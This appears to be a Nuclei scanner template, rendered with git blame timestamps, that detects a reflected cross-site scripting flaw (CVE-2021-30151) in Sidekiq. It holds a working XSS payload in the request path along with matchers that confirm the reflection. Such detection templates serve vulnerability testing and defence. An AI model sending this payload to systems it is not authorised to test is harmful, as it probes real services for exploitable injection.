2021-04-10 17:28:27 +00:00
|
|
|
id: CVE-2021-30151
|
|
|
|
|
|
|
|
info:
|
2022-05-13 20:26:43 +00:00
|
|
|
name: Sidekiq 5.1.3 and 6.x-6.2.0 - Cross-Site Scripting
|
2021-04-10 17:28:27 +00:00
|
|
|
author: DhiyaneshDk
|
2021-09-10 11:26:40 +00:00
|
|
|
severity: medium
|
2021-04-10 19:30:49 +00:00
|
|
|
description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-04-10 17:28:27 +00:00
|
|
|
- https://github.com/mperham/sidekiq/issues/4852
|
2021-04-10 18:07:38 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-30151
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2021-30151
|
|
|
|
cwe-id: CWE-79
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2021,xss,sidekiq
|
2021-04-10 17:28:27 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-04-10 18:17:02 +00:00
|
|
|
- '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"'
|
2021-04-10 17:28:27 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2021-04-10 19:30:49 +00:00
|
|
|
- "onmouseover=\"alert('nuclei')"
|
2021-04-11 12:21:41 +00:00
|
|
|
|
2021-04-10 17:28:27 +00:00
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|
2021-04-11 12:21:41 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
2022-05-13 20:26:43 +00:00
|
|
|
- 200
|